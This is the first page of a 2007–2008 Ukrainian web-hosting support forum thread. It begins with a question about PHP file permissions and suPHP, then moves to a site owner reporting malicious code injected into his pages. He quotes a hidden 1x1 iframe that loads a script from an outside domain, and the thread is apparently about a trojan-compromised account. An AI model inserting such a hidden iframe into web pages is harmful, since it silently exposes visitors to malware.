FORUM.TOPUA.NET
Форум TopUA.NET
 
 ДопомогаДопомога   ПошукПошук   УчасникиУчасники   ГрупиГрупи   РеєстрацiяРеєстрацiя   ПрофільПрофіль   Увiйти до приватних повiдомленьУвiйти до приватних повiдомлень   ВхідВхід     

 TopUA.NET
Питання безпеки
Перейти до сторінки 1, 2  далі
 
Нова тема   Відповісти    Головна -> Підтримка користувачів
Попередня тема :: Наступна тема  
Автор Повідомлення
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: четвер, 27 грудня, 2007 16:11    Тема повідомлення: Питання безпеки Відповісти цитуючи

Поясніть мені будь ласка, як може бути що права на файл виставлено 644, а запустивши РНР-шний скріпт той здійснив в нього запис!?!?!

Дякую
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
Kyrya
Користувач хостингу


З нами з: 16.10.06
Повідомлень: 265
Звідки: Дніпропетровськ

ПовідомленняНаписане: четвер, 27 грудня, 2007 16:32    Тема повідомлення: Відповісти цитуючи

Таке може бути, якщо скрипт запускався з правами власника. Дивіться скріншот. У того файлу права 644.
_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: четвер, 27 грудня, 2007 19:04    Тема повідомлення: Відповісти цитуючи

Скрипт запускався без прав ВЛАСНИКА!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Це точно!- я ж настроївся на глюк, а тут все пішло!!!
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
Kyrya
Користувач хостингу


З нами з: 16.10.06
Повідомлень: 265
Звідки: Дніпропетровськ

ПовідомленняНаписане: четвер, 27 грудня, 2007 19:56    Тема повідомлення: Відповісти цитуючи

BIBLOS написав:
Скрипт запускався без прав ВЛАСНИКА!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Чому Ви так вирішили?

_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: четвер, 27 грудня, 2007 20:23    Тема повідомлення: Відповісти цитуючи

скрипт закинув через ФТП
Закрив, виставив права 644
Тоді через http запустив скрипт встановлення - все пішло запсало, створило новий файл. Я ж через http не авторизувався,
отже скрипт сам без всяких прав створив файлик і записав його!
Як?
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
Дмитро
TopUA: Адміністратор


З нами з: 01.10.06
Повідомлень: 1230

ПовідомленняНаписане: четвер, 27 грудня, 2007 21:13    Тема повідомлення: Відповісти цитуючи

Пошукайте у гуглі про SuPHP Very Happy

Це те, що мають мати всі хостери заради безпеки користувачів (але нажаль, дуже мало хто переймається безпекою).

_________________
● Підтримка користувачів — виключно через форум підтримки
Умови надання послуг безкоштовного хостингу
Догори
Переглянути профіль користувача Відіслати приватне повідомлення
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: вівторок, 22 січня, 2008 12:52    Тема повідомлення: Відповісти цитуючи

Дякую за відповідь. Пошукав, почитав.
Та я нічого не знаю за механізм, і в неті теж не описується, тільки констатація що це і для чого.
Я так зрозумів це модуль який виконує скрипт з правами власника, але ж тоді можна написати код якого небудь двигунця, відкрити доступ до закачки, і "лазити" по чужих сайтах використовуючи функції suPHP?!
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: середа, 06 лютого, 2008 15:40    Тема повідомлення: Відповісти цитуючи

Ще потрібна консультація, чи то відповідь:

Появився на сайті в коді такий собі
...http://leohin.com/.....

Це справа рук Адміна чи "мене Хакнули"?
Дякую!?!?!?!?!
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
Kyrya
Користувач хостингу


З нами з: 16.10.06
Повідомлень: 265
Звідки: Дніпропетровськ

ПовідомленняНаписане: середа, 06 лютого, 2008 15:57    Тема повідомлення: Відповісти цитуючи

Де у коді? Я головну завантажив - нічого немає.
_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: середа, 06 лютого, 2008 16:16    Тема повідомлення: Відповісти цитуючи

СОРІ! Я щойно закинув оновлення!!!!
Забувся, прошу вибачення, але наведений код СПРАВДІ ТАМ був.
Я це замітив по зміні розміру Контрольної копії і на сайті, а після -в модзілі заблоковано було ЯВА, воно мене "обізвало", я зразу закачав і був в шоці, але подумав -можливо це хостери - але ваша відповідь мене насторожує - ЯК!?!?!?!
>>
Привіт!
Подивіться вихідний текст завантаженої сторінки!!!!!!!
там таке
<iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>

Я фреймів не люблю в принципі, і користуюсь сам особисо на 0 %, тому коду такого НЕ ВСТАВЛЯВ ні звідки!!!
???
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
Дмитро
TopUA: Адміністратор


З нами з: 01.10.06
Повідомлень: 1230

ПовідомленняНаписане: четвер, 07 лютого, 2008 05:17    Тема повідомлення: Відповісти цитуючи

Перевірте ваш ПК на наявність троянів...
_________________
● Підтримка користувачів — виключно через форум підтримки
Умови надання послуг безкоштовного хостингу
Догори
Переглянути профіль користувача Відіслати приватне повідомлення
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: четвер, 07 лютого, 2008 18:45    Тема повідомлення: Відповісти цитуючи

2 компютери з 3 перевірені...поки чисто...

Але тепер ще один прикол (його теж раніше не було)
Модзілка показує що заблокований скрипт "about:blank" при загрузці сторінок BIBLOS?
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
Дмитро
TopUA: Адміністратор


З нами з: 01.10.06
Повідомлень: 1230

ПовідомленняНаписане: п'ятниця, 08 лютого, 2008 01:03    Тема повідомлення: Відповісти цитуючи

Поясніть мені, яке я маю до цього відношення? Дуже прошу самотужки розбиратись з тим, що ви встановлюєте на вашому акаунті.

Змініть паролі, видаліть троянів. Якщо є проблема з сервером — буду радий допомогти, але проблеми з сервером немає.

Дякую.

_________________
● Підтримка користувачів — виключно через форум підтримки
Умови надання послуг безкоштовного хостингу
Догори
Переглянути профіль користувача Відіслати приватне повідомлення
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: п'ятниця, 08 лютого, 2008 13:21    Тема повідомлення: Відповісти цитуючи

Прошу не ображатись Wink
Я справді таких випадків не мав! Shocked -на третьому компі були ТрояниMad
Буду знати і постараюсь більше не турбувати з такого приводу Embarassed

Дякую
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
BIBLOS
Користувач хостингу


З нами з: 24.10.06
Повідомлень: 80

ПовідомленняНаписане: четвер, 14 лютого, 2008 16:46    Тема повідомлення: Відповісти цитуючи

Ну ось? Машина чиста, перевірив 5 різними прогами. Більше на сайт не ходив.Я змінив пароль, витер куки і нічого більше не робив.
Пройшло 2 дні -
Прошу загрузити титул - http://www.BIBLOS.org.ua/
там прогружається Ява з ІР- 58.....
Confused
Догори
Переглянути профіль користувача Відіслати приватне повідомлення Відвідати сайт учасника
Показувати:   
Нова тема   Відповісти    Головна -> Підтримка користувачів Ваш часовий пояс: GMT + 3 Години
Перейти до сторінки 1, 2  далі
Сторінка 1 з 2

 
Перейти до:  
Ви не можете писати нові повідомлення в цю тему
Ви не можете відповідати на теми у цьому форумі
Ви не можете редагувати ваші повідомлення у цьому форумі
Ви не можете видаляти ваші повідомлення у цьому форумі
Ви не можете голосувати у цьому форумі
Ви не можете закачувати файли у цьому форумі
Ви не можете зкачувати файли у цьому форумі


Powered by phpBB © 2001, 2005 phpBB Group


Український рейтинг TOP.TOPUA.NET Українське радiо